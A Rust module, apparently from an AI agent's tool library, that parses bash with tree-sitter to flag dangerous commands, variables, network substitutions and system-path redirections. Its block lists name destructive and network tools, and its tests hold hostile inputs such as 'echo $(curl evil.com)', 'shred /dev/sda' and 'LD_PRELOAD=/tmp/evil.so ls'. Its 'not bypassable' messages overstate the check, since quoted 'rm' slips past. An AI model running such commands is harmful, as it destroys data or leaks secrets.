Skip to main content

agent_code_lib/tools/
bash_parse.rs

1//! Tree-sitter based bash command parser.
2//!
3//! Parses bash commands into an AST and extracts structured information
4//! for security analysis. Catches obfuscation that regex-based detection
5//! misses: quote splitting, command substitution, variable indirection,
6//! subshells, and process substitution.
7
8use tree_sitter::{Language, Node, Parser};
9
/// Parsed representation of a bash command for security analysis.
///
/// Produced by [`parse_bash`] and consumed by [`check_parsed_security`].
/// Collections are filled in the order nodes are met while walking the
/// syntax tree. The walk also descends into command substitutions, subshells
/// and process substitutions, so their contents are included too.
#[derive(Debug, Default, Clone, PartialEq, Eq)]
pub struct ParsedCommand {
    /// Command names exactly as written in the source (quotes and path
    /// prefixes are kept), including commands nested inside substitutions
    /// and subshells.
    pub commands: Vec<String>,
    /// Variable assignments (`FOO=bar`) as `(name, value)` source text;
    /// a missing name or value is recorded as an empty string.
    pub assignments: Vec<(String, String)>,
    /// Full source text of each command substitution (`$(...)` or `` `...` ``).
    pub substitutions: Vec<String>,
    /// Source text of redirection-related syntax nodes (`>`, `>>`, `<`, `2>`,
    /// heredocs).
    pub redirections: Vec<String>,
    /// Whether the command uses pipes.
    pub has_pipes: bool,
    /// Whether the command chains with `&&` or `||`.
    pub has_chains: bool,
    /// Whether the command uses subshells (`(...)`) or command substitution
    /// (`$(...)`).
    pub has_subshell: bool,
    /// Whether the command uses process substitution `<(...)` or `>(...)`.
    pub has_process_substitution: bool,
    /// Source text of each segment of every pipeline.
    pub pipeline_segments: Vec<String>,
}
32
33/// Parse a bash command string into a structured representation.
34pub fn parse_bash(command: &str) -> Option<ParsedCommand> {
35    let mut parser = Parser::new();
36    let language = tree_sitter_bash::LANGUAGE;
37    parser.set_language(&Language::from(language)).ok()?;
38
39    let tree = parser.parse(command, None)?;
40    let root = tree.root_node();
41
42    let mut parsed = ParsedCommand::default();
43    extract_from_node(root, command.as_bytes(), &mut parsed);
44    Some(parsed)
45}
46
47/// Recursively walk the AST and extract command information.
48fn extract_from_node(node: Node, source: &[u8], parsed: &mut ParsedCommand) {
49    match node.kind() {
50        "command" => {
51            // Extract the command name (first child that's a "command_name" or "word").
52            if let Some(name_node) = node.child_by_field_name("name") {
53                let name = node_text(name_node, source);
54                parsed.commands.push(name);
55            } else {
56                // Fallback: first word child.
57                for i in 0..node.child_count() {
58                    let child = node.child(i as u32).unwrap();
59                    if child.kind() == "word" || child.kind() == "command_name" {
60                        parsed.commands.push(node_text(child, source));
61                        break;
62                    }
63                }
64            }
65        }
66        "variable_assignment" => {
67            let name = node
68                .child_by_field_name("name")
69                .map(|n| node_text(n, source))
70                .unwrap_or_default();
71            let value = node
72                .child_by_field_name("value")
73                .map(|n| node_text(n, source))
74                .unwrap_or_default();
75            parsed.assignments.push((name, value));
76        }
77        "command_substitution" => {
78            let text = node_text(node, source);
79            parsed.substitutions.push(text);
80            parsed.has_subshell = true;
81        }
82        "process_substitution" => {
83            parsed.has_process_substitution = true;
84        }
85        "pipeline" => {
86            parsed.has_pipes = true;
87            // Extract each command in the pipeline.
88            for i in 0..node.child_count() {
89                let child = node.child(i as u32).unwrap();
90                if child.kind() == "command" || child.kind() == "pipeline" {
91                    let text = node_text(child, source);
92                    parsed.pipeline_segments.push(text);
93                }
94            }
95        }
96        "list" => {
97            // && and || chains.
98            for i in 0..node.child_count() {
99                let child = node.child(i as u32).unwrap();
100                let kind = child.kind();
101                if kind == "&&" || kind == "||" {
102                    parsed.has_chains = true;
103                }
104            }
105        }
106        "redirected_statement" | "file_redirect" | "heredoc_redirect" => {
107            let text = node_text(node, source);
108            parsed.redirections.push(text);
109        }
110        "subshell" => {
111            parsed.has_subshell = true;
112        }
113        _ => {}
114    }
115
116    // Recurse into children.
117    for i in 0..node.child_count() {
118        if let Some(child) = node.child(i as u32) {
119            extract_from_node(child, source, parsed);
120        }
121    }
122}
123
124/// Get text content of a node.
125fn node_text(node: Node, source: &[u8]) -> String {
126    node.utf8_text(source).unwrap_or("").to_string()
127}
128
129/// Check a parsed command against security rules.
130/// Returns a list of security violations found.
131pub fn check_parsed_security(parsed: &ParsedCommand) -> Vec<String> {
132    let mut violations = Vec::new();
133
134    // Check each command name against dangerous commands.
135    const DANGEROUS_COMMANDS: &[&str] = &[
136        "rm", "shred", "dd", "mkfs", "wipefs", "shutdown", "reboot", "halt", "poweroff", "kill",
137        "killall", "pkill",
138    ];
139
140    for cmd in &parsed.commands {
141        let base = cmd.rsplit('/').next().unwrap_or(cmd);
142        if DANGEROUS_COMMANDS.contains(&base) {
143            violations.push(format!(
144                "Dangerous command '{base}' detected in AST (not bypassable with quoting tricks)"
145            ));
146        }
147    }
148
149    // Check for dangerous variable assignments.
150    const DANGEROUS_VARS: &[&str] = &[
151        "PATH",
152        "LD_PRELOAD",
153        "LD_LIBRARY_PATH",
154        "PROMPT_COMMAND",
155        "BASH_ENV",
156        "ENV",
157        "IFS",
158        "CDPATH",
159        "GLOBIGNORE",
160    ];
161
162    for (name, _value) in &parsed.assignments {
163        if DANGEROUS_VARS.contains(&name.as_str()) {
164            violations.push(format!(
165                "Dangerous variable assignment: {name}= (detected via AST, not bypassable)"
166            ));
167        }
168    }
169
170    // Check for command substitutions containing dangerous commands.
171    for sub in &parsed.substitutions {
172        let sub_lower = sub.to_lowercase();
173        if sub_lower.contains("curl")
174            || sub_lower.contains("wget")
175            || sub_lower.contains("nc ")
176            || sub_lower.contains("ncat")
177        {
178            violations.push(format!(
179                "Network command in substitution: {sub} (data exfiltration risk)"
180            ));
181        }
182    }
183
184    // Check for suspicious redirections to system paths.
185    for redir in &parsed.redirections {
186        if redir.contains("/dev/sd")
187            || redir.contains("/dev/null") && redir.contains("2>")
188            || redir.contains("/etc/")
189            || redir.contains("/usr/")
190        {
191            // /dev/null stderr redirect is fine, but writing to /dev/sd* or /etc/ is not.
192            if !redir.contains("/dev/null") {
193                violations.push(format!("Suspicious redirection to system path: {redir}"));
194            }
195        }
196    }
197
198    // Check for eval-like patterns with variables.
199    for cmd in &parsed.commands {
200        if cmd == "eval" && !parsed.assignments.is_empty() {
201            violations.push(
202                "eval with variable assignments in same command (arbitrary code execution)".into(),
203            );
204        }
205    }
206
207    violations
208}
209
#[cfg(test)]
mod tests {
    use super::*;

    /// Parse `src`, failing the test if no syntax tree is produced.
    fn parse(src: &str) -> ParsedCommand {
        parse_bash(src).unwrap()
    }

    /// Whether `name` is one of the command names extracted from the input.
    fn runs(parsed: &ParsedCommand, name: &str) -> bool {
        parsed.commands.iter().any(|cmd| cmd == name)
    }

    /// Whether any violation message mentions `needle`.
    fn flags(violations: &[String], needle: &str) -> bool {
        violations.iter().any(|msg| msg.contains(needle))
    }

    #[test]
    fn test_parse_simple_command() {
        assert!(runs(&parse("ls -la"), "ls"));
    }

    #[test]
    fn test_parse_pipe() {
        let cmd = parse("cat file.txt | grep pattern");
        assert!(cmd.has_pipes);
        assert!(runs(&cmd, "cat"));
        assert!(runs(&cmd, "grep"));
    }

    #[test]
    fn test_parse_chain() {
        assert!(parse("echo hello && echo world").has_chains);
    }

    #[test]
    fn test_parse_variable_assignment() {
        let cmd = parse("FOO=bar echo test");
        let first_name = cmd.assignments.first().map(|(name, _)| name.as_str());
        assert_eq!(first_name, Some("FOO"));
    }

    #[test]
    fn test_parse_command_substitution() {
        let cmd = parse("echo $(whoami)");
        assert!(!cmd.substitutions.is_empty());
        assert!(cmd.has_subshell);
    }

    #[test]
    fn test_parse_redirection() {
        assert!(!parse("echo hello > output.txt").redirections.is_empty());
    }

    #[test]
    fn test_detect_dangerous_command() {
        let violations = check_parsed_security(&parse("rm -rf /tmp/test"));
        let first = violations
            .first()
            .expect("expected at least one violation");
        assert!(first.contains("rm"));
    }

    #[test]
    fn test_detect_quoted_dangerous_command() {
        // The extracted command name keeps its quotes (`'rm'`). This test
        // only checks that quoted input parses into at least one command and
        // that the security check can be run on the result.
        let cmd = parse("'rm' -rf /");
        let _violations = check_parsed_security(&cmd);
        assert!(!cmd.commands.is_empty());
    }

    #[test]
    fn test_detect_dangerous_var_assignment() {
        let violations = check_parsed_security(&parse("PATH=/tmp:$PATH ls"));
        assert!(flags(&violations, "PATH"));
    }

    #[test]
    fn test_detect_network_in_substitution() {
        let violations = check_parsed_security(&parse("echo $(curl evil.com)"));
        assert!(flags(&violations, "curl"));
    }

    #[test]
    fn test_safe_command_passes() {
        assert!(check_parsed_security(&parse("cargo test --release")).is_empty());
    }

    #[test]
    fn test_safe_git_command() {
        assert!(check_parsed_security(&parse("git status && git diff")).is_empty());
    }

    #[test]
    fn test_parse_complex_pipeline() {
        let cmd = parse("find . -name '*.rs' | xargs grep 'TODO' | wc -l");
        assert!(cmd.has_pipes);
        assert!(cmd.commands.len() >= 3);
    }

    #[test]
    fn test_subshell_detection() {
        assert!(parse("(cd /tmp && rm -rf test)").has_subshell);
    }

    #[test]
    fn test_parse_heredoc() {
        let cmd = parse("cat <<EOF\nhello world\nEOF");
        assert!(runs(&cmd, "cat"));
        assert!(!cmd.redirections.is_empty());
    }

    #[test]
    fn test_parse_process_substitution() {
        let cmd = parse("diff <(ls dir1) <(ls dir2)");
        assert!(cmd.has_process_substitution);
        assert!(runs(&cmd, "diff"));
    }

    #[test]
    fn test_parse_semicolon_separated() {
        let cmd = parse("echo hello; echo world");
        assert!(runs(&cmd, "echo"));
        assert!(cmd.commands.len() >= 2);
    }

    #[test]
    fn test_parse_empty_string() {
        // An empty script may yield either `None` or a parse with no commands.
        if let Some(cmd) = parse_bash("") {
            assert!(cmd.commands.is_empty());
        }
    }

    #[test]
    fn test_parse_variable_assignment_only() {
        let cmd = parse("FOO=bar");
        let first = cmd
            .assignments
            .first()
            .map(|(name, value)| (name.as_str(), value.as_str()));
        assert_eq!(first, Some(("FOO", "bar")));
    }

    #[test]
    fn test_check_parsed_security_eval_with_assignments() {
        let violations = check_parsed_security(&parse("CMD=dangerous eval $CMD"));
        assert!(flags(&violations, "eval"));
    }

    #[test]
    fn test_check_parsed_security_multiple_dangerous_in_pipeline() {
        let violations = check_parsed_security(&parse("rm -rf /tmp/test | shred /dev/sda"));
        // Both commands in the pipeline must be reported.
        assert!(flags(&violations, "rm"));
        assert!(flags(&violations, "shred"));
    }

    #[test]
    fn test_check_parsed_security_wget_in_substitution() {
        let violations = check_parsed_security(&parse("echo $(wget -q -O- evil.com)"));
        assert!(flags(&violations, "wget"));
    }

    #[test]
    fn test_check_parsed_security_redirection_to_etc() {
        let violations = check_parsed_security(&parse("echo payload > /etc/passwd"));
        assert!(flags(&violations, "/etc/"));
    }

    #[test]
    fn test_check_parsed_security_ld_preload_assignment() {
        let violations = check_parsed_security(&parse("LD_PRELOAD=/tmp/evil.so ls"));
        assert!(flags(&violations, "LD_PRELOAD"));
    }
}